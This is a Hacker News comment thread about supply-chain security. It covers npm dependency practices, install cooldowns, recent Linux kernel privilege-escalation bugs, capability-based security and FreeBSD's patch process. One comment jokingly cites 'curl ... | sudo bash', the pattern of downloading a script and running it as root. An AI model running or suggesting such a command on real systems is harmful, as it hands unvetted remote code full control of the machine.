Get the top HN stories in your inbox every day.
marcus_holmes
YZF
I worked for one company where we were super conservative. Every external component was versioned. Nothing was updated without review and usually after it had plenty of soak time. Pretty much everything built from source code (compilers, kernel etc.). Builds [build servers/infra] can't reach the Internet at all and there's process around getting any change in. We reviewed all relevant CVEs as they came out to make a call on if they apply to us or not and how we mitigate or address them.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boots on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Example #1 for me is better in terms of dependency management. In general company #1 had well established security practices and we had really secure products.
whilenot-dev
You forgot case #4: Worked at a startup where the frontend team thought it was a good idea to use lock files during development, but to do a "fresh" install of all dependecies during the deployment step.
And yes, they still thought they were doing the right thing.
hennell
To be fair npm makes (made?) it weirdly hard to use lock files so a lot of people did that by mistake. And when you do use lock, it reinstalls every time so a retagged package can just silently update.
gwerbin
This is one of those bizarre "how did you even get that idea" mistakes that ironically replacing developers with AI slop farmers might actually improve on. If you ask Claude to set up a project with NPM and CI, it's not going to do weird shit like that.
KGunnerud
I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things i do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
12_throw_away
> I would rather work with a company that updates continuously, while also building security into multiple layers so that weaknesses in one layer can be mitigated by others.
Sorry, if you are updating continuously, that there is at least one layer that you failed to build any security into.
bshanks
What's the conservative best practice for a solo founder (a one person company; assume the person spends ~20 hours per week on software development/maintenance and the rest of the time on other stuff)?
pseudohadamard
It's interesting how standards have changed. 25 years ago people screamed about ActiveX despite Microsoft's various attempts to lock it down. Today people use something that pulls a package from a Github repo that was abandoned eight years ago that pulls a package from an FTP server in Denmark that pulls a package from a Raspberry Pi in someone's basement in New Mexico and it's all good practice.
dataflow
> Everyone seems to think they are doing the right thing
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
KronisLV
> if they saw the risk as large enough.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
emodendroket
Really? You think the alternate mode where you're running 5-year-old versions of stuff with tons of known security flaws is better?
ndsipa_pomu
> It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
JTbane
Honestly the de facto standard is to blame: at my dev job, we vacuum up all the packages we need and get the software deployed to production ASAP, then later go over the SBOM and make sure nothing looks sketchy. I'd imagine this is the default most places; an intensive approval process would slow down CI/CD too much.
echelon_musk
Do you ride an R1?
YZF
I used to ride a 600R ... yes- that's where my handle comes from ;)
tclancy
So, to play Pandora, what if the net effect of uncovering all these unknown attack vectors is it actually empties the holsters of every national intelligence service around the world? Just an idea I have been playing with. Say it basically cleans up everything and everyone looking for exploits has to start from scratch except “scratch” is now a place where any useful piece of software has been fuzz tested, property tested and formally verified.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
xingped
TBH this is a pretty good way of looking at it. Yeah we're seeing an explosion of vulnerabilities being found right now, but that (hopefully) means those vulnerabilities are all being cleaned up and we're entering a more hardened era of software. Minus the software packages that are being intentionally put out as exploits, of course. Maybe some might say it's too optimistic and naive, but I think you have a good point.
michaelchisari
I agree with the prediction but not the timing. We won't enter a more hardened era of software until after a long period of security vulnerabilities.
Rivers caught on fire for a hundred years before the EPA was formed.
FrinkleFrankle
New code will also use these tools from the get go, hopefully vastly reducing the vulnerabilities that make it to prod to begin with.
akoboldfrying
> we're entering a more hardened era of software
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OS library; there's no reason to assume the average author would magically create fewer bugs than the original OS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of funding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
anankaie
To be fair, to some extent that’s up to us. Time to get cleaning, I guess.
larodi
You are avoiding intentionally to say ‘thanks to LLMs’ or is implicit? As all these recent mega bugs surface with lots of fuzzing and agentic bashing, right ?
jpollock
Faults are injected into the code at a constant rate per developer. Then there's the intentional injections.
Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?
rounce
This is related to a massive annoyance of mine: when I run a piece of software and the system is missing a required dependency, I want the software to *tell me* that dependency is missing so I can make a decision about proceeding or not. Instead it seems that far too often software authors will try and be “clever” by silently installing a bunch of dependencies, either in some directory path specific to the software, or even worse globally.
I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
i_think_so
Is it really a constant rate? Or is it a Law of Large Numbers kind of thing, where past a certain scale the randomness gets smoothed out and looks constant? Or something else?
(Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)
teiferer
curl ... | sudo bash
yolo!
allthetime
New software is being generated faster than it can be adequately tested. We are in the same place we’ve always been; except everything is moving much too fast.
repelsteeltje
This is exactly the feeling I have. First: excessive growth of dependencies fueled by free components.
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
ClikeX
I'm somehow reminded of Wile E Coyoto running off a ledge, staying afloat until he realizes there is no more ground under his feet.
bulbar
I think it will be an arms race in the future as well. Easier to fix known vulnerabilities automatically, but also easier to find new ones and the occasionally AI fuckup instead of the occasionally human fuckup.
bigiain
Yeah.
Right now it kinda feels to me like "Open Source" is the Russian army, assuming their sheer numbers and their huge quantity of equipment much off which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.
marcus_holmes
This assumes that there are no new exploits being generated.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
teiferer
That is already how it works. The loner hacker in moms basement working for free on his super critical OSS package is largely a myth. The vast majority of OSS code is contributed by companies paying their employees to work on it.
mastermage
There is an xkcd about that i think
mahart
Having casually read into a few recent incidents the vector has often been outside of software. A lot of mis-configurations or simply attacking the human in the chain. And nation states have basically unbounded resources for everything from bribes, insiders, and even standing up entire companies.
dml2135
Here's a crazy idea -- what if some of these vulnerabilities are surfacing because they have actually been found, already, and exist in the training data?
Even an intelligence agency doesn't have perfect opsec, and something could get mentioned offhand somewhere on a forum, but never get picked up until the LLM uses it.
Barbing
Will need those animal bones if all the industrial control systems get turned against us
Nuclear might be airgapped but what about water, power…?
josephg
I've been wanting a capability based security model for years. Argued about it here in fact. Capabilities are kind of an object pointer with associated permissions - like a unix file descriptor.
We should have:
- OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.
- Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.
SeL4 has fast, efficient OS level capabilities. Its had them for years. They work great. They're fast - faster than linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run linux as a process in sel4. I want an OS that has all the features of my linux desktop, but works like SeL4.
Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.
mike_hearn
Capabilities have a lot of serious design problems which is why no mainstream language has them. Because this comes up so often on HN I wrote an essay explaining the issues here:
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.
The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
josephg
> I wrote an essay explaining the issues here
This essay only addresses my second point - capabilities within a program. It doesn't address OS level capabilities at all.
But even in the space of programming languages, I find this essay extremely unconvincing. Like, you raise points like this:
> Here are some problems you’ll have to solve in order to sandbox libraries: What is your threat model? How do you stop components tampering with each other’s memory?
The threat model is left pad cryptolockering your computer via a supply chain attack. The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.
You stop components tampering with each others' memory by using a memory safe language.
> its main() method must be given a “god object” exposing all the ambient authorities the app begins with
So what? The main function already takes arguments. I don't understand the problem.
Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.
Then there's these weird claims:
> Any mutable global variable is a problem as it may allow one component to violate expectations held by another.
You don't need to ban mutable global variables! Lets imagine we did this in safe rust. I think the only constraint is that a global variable can't be shared over the boundary between crates. But - nobody does that anyway. Even if you did share a global over a crate boundary, the child crate would still only be able to access it through methods on the type.
Sneaky developers could leverage globals to violate the security boundary. But it would be hard to do by accident. Maybe just, don't do that.
Your essay talks about some research project making a capability based java subset. And I understand that the resulting ergonomics weren't very good. But that isn't evidence that capabilities themselves are a bad idea. If a research student wrote a half baked C compiler one time, you wouldn't take that as evidence that C compilers are a bad idea. I do, however, accept that the burden of proof is on me to demonstrate that its a good idea. I hope that I can some day rise to that challenge.
> The filesystem is a trusted entity on any OS design I'm familiar with
Thats not how capability based microkernels like SeL4 work. The filesystem is owned by a specialised process. Other processes only modify files by sending messages to the filesystem process via a capability handle. If nobody created a writable file handle, the file can't be arbitrarily mutated by another module. Copyfail happened because in linux, any code can by default interact with the page table. One piece of code was missing access control checks. In capability based systems, its basically impossible to accidentally forget access control checks like that.
> The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
Copyfail is a logic bug. C#, Java or Kotlin wouldn't save you from it at all.
theamk
Note that capabilities would not help for those bugs we are discussing today.
Those exploits are in kernel, and the userspace is only calling the normal, allowed calls. Removing global open()/listen()/etc.. with capability-based versions would still allow one to invoke the same kernel bugs.
(Now, using microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent from what userspace does, you can have POSIX layer with seL4 and (2) that would be may more context switches, so a performance drop)
josephg
> Note that capabilities would not help for those bugs we are discussing today.
Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.
Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.
A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.
> (2) that would be may more context switches, so a performance drop
I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).
But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.
I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.
grebc
Have you heard of pledge in OpenBSD?
I prefer it’s model of declaring this is what I want to use, any calls to code outside that error out.
josephg
Yes. But its nowhere near as powerful as capabilities.
- Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.
- Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.
- You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.
c7b
My pet theory is that package managers will one day be seen like we see object-oriented programming today. As something that was once popular but that we've since grown out of. It's also a design flaw that I see in cargo/Rust. Having to import 3rd party packages with who-knows-what dependencies to do pretty much anything, from using async to parsing JSON, it's supply chain vulnerability baked into the language philosophy. npm is no better, but I'm mentioning Rust specifically because it's an otherwise security-conscious language.
mike_hearn
The industry hasn't grown out of OOP. Go look at any major production codebase businesses rely on and it's fully of objects and classes, including new codebases made very recently.
Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).
Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
c7b
It's a condensed statement. There was a time when I would start a new programming project thinking about class hierarchies, maybe drawing some UML diagrams. I don't do that anymore, and I don't believe it's very common for greenfield projects anymore. But educate me if that's wrong. We've kept some of the good ideas from OOP like namespaces and interfaces and we use them in slightly different contexts now, where OOP may even still be technically possible, but it's not the primary way of doing things anymore. I believe, or at least hope, that we will see a similar kind of evolution for package managers. Where it's still possible to use other people's code, but having packages like left-pad or is-even is no longer how it's commonly being used, even if it may still technically be possible.
pjmlp
Rust is quite bad on this, having to rely on external crates for error handling or macros is even worse than what async runtime to pick up.
Yes, I mean crates like anyerror and syn.
kibwen
I'm all for including more things in the Rust standard library, but anyhow and syn are literally from a core Rust dev. It's not some left-pad rando, it's like a Linux user saying they don't trust the Git developer.
weregiraffe
But you can't expect the language std to supply you with every package under the sun.
c7b
I don't have an answer what the alternative is going to look like. But smarter people than me may find something. C/C++ are doing fine without package managers. Go at least has a more capable standard library than Rust. But I'm not sure if Go's import github approach is the answer.
One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.
foresto
A stdlib doesn't have to provide everything under the sun in order to be helpful here.
Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.
That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.
dguest
Most people will avoid sticking things in their mouth by default. They don't wait for the microbial cultures to come back positive to say no.
We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.
noduerme
The billions of burgers served by fast food franchises with long histories of poisoning people would argue that delicious convenience overrides the hygiene instinct.
Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.
xboxnolifes
> They don't wait for the microbial cultures to come back positive to say no.
They dont wait for the cultures to come back negative to say yes either. They just eat what they are served.
dguest
Exactly! They rely heuristics like that they are being served in a clean public restaurant which is presumably following health code, and is staffed by people who follow standard norms on hygiene. In some countries the norm is for the kitchen to be visible so the patrons can take a peak themselves.
If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food totally free, I think most people will think twice.
yxhuvud
Most people start out as kids that does exactly that.
1718627440
And kids do not decide what to buy and how to prefer that food for exactly that reason.
oever
That means going back to disabling Javascript or only allowing widely used, well-maintained Javascript libraries.
mschuster91
> or only allowing widely used, well-maintained Javascript libraries.
That isn't a guarantee either, just last month someone compromised the Axios library.
larodi
Indeed - one year ago we floated the idea it is better to write your code if you can, than get third parties. But it was a heresy at the time to consider LLMm filling the gaps.
Today I’m limiting the exposure to dependencies more than ever, and particularly for things that take few hundred lines to implement. It’s a paradigm shift, no less.
orbital-decay
This replaces supply chain trust with the trust in the LLM and the provider you're using. Even if you exclude model devs from your threat model and are running the LLM yourself, it's still an uninterpretable black box that is trained on the web data which can be and is manipulated precisely to attack LLMs during training. So this approach still needs proper supply chain security.
larodi
Well it needs, and in particular if you use an adversarial model tuned to inject malware. Not sure if it was researched though to this degree and no provider would tell you anyways I guess :)
noduerme
There are a lot of libs you really can't justify implementing from scratch. Mathjs and node-mysql jump to mind. Poisoned chains build up from small dependencies, and clearly staying on top of your dependency chain should be a full time job - if anyone was willing to pay someone to do that full time.
larodi
Of course, and thank God for them. But many more look more complicated and serve more use case than you typically actually need. Like - how much of ffmpeg you need, well depends on the project. And perhaps someone is happily tearing it down with LLM to get precisely these parts (not me, though I enjoy doing it to LLMs and other models).
But being able to have agents implement pelr5 in rust and make it faster and more secure raises many questions towards the role of open source and consequences of security and supply chain risks.
sergeykish
Web pages handled by browsers. Linux desktop running code without sandbox is reckless, relied on verification by distro maintainers, does not work the moment users run proprietary software.
Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.
Animats
> The sheer mass of packages
Yes.
I just noticed that a Rust program I'm working on had acquired a plotter driver crate. A plotter driver? The program has no graphical output.
Turns out that "kdtree" has a dev dependency on a profiling library that pulls in a whole graphics system. Even in release mode, I get that, because I have debug symbols turned on, which activated dev dependencies.
Aargh.
endospore
> I have debug symbols turned on, which activated dev dependencies
Nope that doesn't happen. It's not compiled into your binary if it's a dev or build dependency. Cargo may have downloaded the crate source according to the lockfile and that's it, it shouldn't build anything unneeded.
Animats
OK, I have to check the binary.
CriticalRegion
This is a baffling take.. These exploits are local privilege escalations for linux systems. They'll allow an attacker with a foothold in a shared environment or with low privilege access to a system to affect the rest of the system. They aren't RCEs and won't let attackers access environments that they couldn't before other than the shared hosting scenarios. That is absolutely not how most supply chain attacks are carried out. Most supply chain attacks are performed via credential theft and social engineering. The more sophisticated ones are APT style attacks like the Solarwinds one (which were carried out by organisations that would already have exploits like these) or more creative stuff like the Shai-Hulud fiasco. All of these options existed before these LPEs. If you're worried about supply chain attacks you've been worried for longer than Mythos has been out. Not updating your software is never good security advice.
AntiUSAbah
The supply chain attack in this case, would be injecting the exploit on a ci/cd system and escalating the local user who runs the npm code to root.
The proper response from them and you, should be to make sure to have some isolatin between user space and root like gvisor.
Phelinofist
Either my reading of your comment is wrong or you misunderstood the supply chain comment by OP I think: what they mean is that a supply chain attack that gets the exploit on a system would be great now because the reported vulns are unfixed pretty much everywhere
CriticalRegion
No, you read it right. I just misunderstood the post's message as "these exploits will enable more supply chain attacks". I'll probably delete my comment since it's debating a strawman. It is absolutely right that these exploits might enable these attacks to have a larger impact. I still don't think that I agree with the message since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update.
Phelinofist
> since a malicious npm package already installed can get its payloads from a C2 server, it doesn't need an npm update
In general I agree, but I think these two vulns are 0day-y and pretty much every major distro is affected AFAIU, so there is perhaps slightly more potential than usual
throawayonthe
yeah but i mean installing an npm package in a container is giving it low privilege access
traderj0e
Well it does say "install" new software, as in run code locally
0xbadcafebee
"Wait a week to install software" does not work. Just a few months ago a massive exploit hit the web, which was a timed attack which sat for more than a month before executing. If everyone starts waiting a week, their exploits will wait 2 weeks. Cyber criminals do not need to exploit you immediately, they just need to exploit you. (It also doesn't change a large range of vuln classes like typosquatting)
tom_alexander
I think the author was suggesting "wait a week" as a one-time wait for fixes to be written and patches distributed for these specific prematurely-disclosed vulnerabilities, not an on-going suggestion for delaying all updates. But otherwise I agree with you.
moebrowne
> If everyone starts waiting a week, their exploits will wait 2 weeks
It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.
There are lists of attacks which had an exposure window which was much shorter than 2 weeks:
https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...
gpm
I think you misunderstood the article. The proposal isn't wait a week after Software has been published before installing it. It's in the next seven days starting now, just don't, because you probably don't have patches for these vulnerabilities and even if you do there's probably more scary vulnerabilities about to be discovered.
hnfong
I think it's even more specific.
From TFA:
> Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.
This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.
dingocat
You're throwing the baby out with the bathwater, though. Waiting a week still prevents a decent amount of attacks. Not every attack can evade detection for two weeks. Even if it did, security scanning tools might still detect them.
Say hypothetically that 20% of attack slip through, which is still worrying, you can mitigate 80% of attacks by just waiting a week. It's a low risk, high reward strategy.
Nathanba
well then let's wait a month or even two months. The point of the wait period is primarily to avoid the new installation of exploits, not the execution of already installed exploits.
whazor
A popular package has more exposure. When the artefact is published, the entire world can see it. Hopefully some people check the diff between versions. But without any delays then you could be hit by exploits nobody has seen yet.
chakintosh
Yeah, Stuxnet was dormant for a year until execution.
fny
This is why cooldowns have space for patches.
cperciva
Alternatively, switch to an operating system like FreeBSD which doesn't take a YOLO approach to security. Security fixes don't just get tossed into the FreeBSD kernel without coordination; they go through the FreeBSD security team and we have binary updates (via FreeBSD Update, and via pkgbase for 15.0-RELEASE) published within a couple minutes of the patches hitting the src tree. (Roughly speaking, a few seconds for the "I've pushed the patches" message to go out on slack, 10-30 seconds for patches to be uploaded, and up to a minute for mirrors to sync).
gucci-on-fleek
I'm somewhat skeptical here, because I notified the FreeBSD security team of a vulnerability a few years ago, and I never got a response, even after a follow-up email a few weeks later. To be fair, my report was about a non-core component, and the vulnerability wouldn't be very easy to exploit, but Debian, OpenBSD, SUSE, and Gentoo all patched it within a week [0].
That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)
[0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline
stingraycharles
Linux Kernel doesn’t differentiate between security bugs and other bugs, which is the main complaint here I think. They have the same process.
So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.
landr0id
FreeBSD didn’t have user land ASLR until 2019 and, amongst other mitigations, still doesn’t have kASLR. It’s not a serious operating system for people who care about security. If you want FreeBSD and security take Shawn Webb’s HardenedBSD.
kelnos
Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat. It's a speed bump, not a brick wall.
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
landr0id
>Last I read, ASLR is a good thing to have, but overall is usually not difficult to defeat.
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
abrookewood
Is there anywhere that provides a good overview of the various OS protection technologies/approaches that exist and which OSes have implemented them?
user3939382
So you have one example in hand and trash talked FreeBSD’s entire security team. Bold claims are fine but this is lazy.
FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?
landr0id
Ask yourself why Mythos was so easily able to develop a remote STACK buffer overflow vulnerability.
krupan
If you are switching to a BSD for security reasons, why FreeBSD? Isn't OpenBSD the super secure one? Sorry, it's been a while since I've looked at those projects
loloquwowndueo
The person suggesting FreeBSD is a FreeBSD developer (Colin Percival - actually according to Wikipedia FreeBSD engineering lead), would be weird for him to suggest openbsd.
Rendello
I'm reminded of another legendary HN thread:
andai
I haven't switched to BSD but I've been thinking about it for a while. I just saw Vultr has both FreeBSD and OpenBSD!
tclancy
There’s always a guy. It’s great that your favorite distro is definitely safer. An order of magnitude fewer exploits will mean only a few thousand or so, I suppose. Ozymandis used Gentoo.
dag100
Calling FreeBSD "just a distro" is verging on insulting. It's an operating system.
tclancy
Apologies, "OS". I am not a native speaker of whatever place that considers these fightin' words.
pocksuppet
Distros are operating systems.
shakna
Well, as they're a FreeBSD dev, I would be surprised if they pointed anyone in a different direction.
undefined
LoganDark
FreeBSD is not a distro. It's not even Linux; it's a completely different kernel and operating system that traces back to even before Linux. It's honestly closer to Darwin than it is to Linux; macOS is technically a BSD. (Not FreeBSD though.)
steve1977
Darwin is its own thing really. There are parts from BSD, there are also parts from Mach and there are also unique parts.
dijit
FreeBSD is quite lax when it comes to security- especially defaults and configs.
The preference is for usability over security.
Famously: https://vez.mrsk.me/freebsd-defaults
I appreciate your work on the project, but I can’t in good conscience suggest people switch while are such bad defaults.
eahm
Also funny they never show Debian in those tests/videos.
cperciva
Debian is probably the best of all the Linuxes, but still suffers from split-brain: If patches are sent upstream first, Debian can't start digesting them until they're already public.
With FreeBSD there's never any question of "who should this get reported to".
JoshTriplett
> Debian can't start digesting them until they're already public
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
goodpoint
No, Debian has its own security team and receives embargoed vulnerabilities and patches.
homebrewer
Has everyone here already forgotten about the WireGuard tire fire?
https://lwn.net/Articles/850098
https://news.ycombinator.com/item?id=26507507
tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.
Was this process problem fixed?
f30e3dfed1c9
Been constructing a lot of infrastructure servers recently, almost all of them FreeBSD VMs running under bhyve on FreeBSD physical hosts. It's a very simple, clean, pleasant environment to work in. And they all run tarsnap. ;-)
AgentME
There's already an okay solution to supply-chain attacks against dependency managers like npm, PyPI, and Cargo: set them to only install package versions that are more than a few days old. The recent high-profile attacks were all caught and rolled back within a day, so doing this would have let you safely avoid the attacks. It really should be the default behavior. Let self-selected beta testers and security scanner companies try out the newest versions of packages for a day before you try them. Instructions: https://cooldowns.dev/
edoceo
More a case for something like this from Show HN three months ago
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
Johnny555
Does that really scale well? Thanks to cascading dependencies, even a medium sized project can import hundreds of dependencies. Can a developer really review them all to figure out if they are safe and that there's not security fix that was fixed in a newer version of the package?
jpollock
Yes, that is what is required. Every dependency needs an internal owner and reviewer. Every change needs to be reviewed and brought into the internal repository.
If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?
It's a software engineering version of the professional engineering stamp.
edoceo
I love the sibling response from @jp...
Also, IME we don't deep dive everything (should we?)
For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.
undefined
undefined
pjmlp
Even better, only use company vetted repos, everyone is forbidded to install directly from the Internet repos.
This naturally doesn't work outside corporations.
ric2b
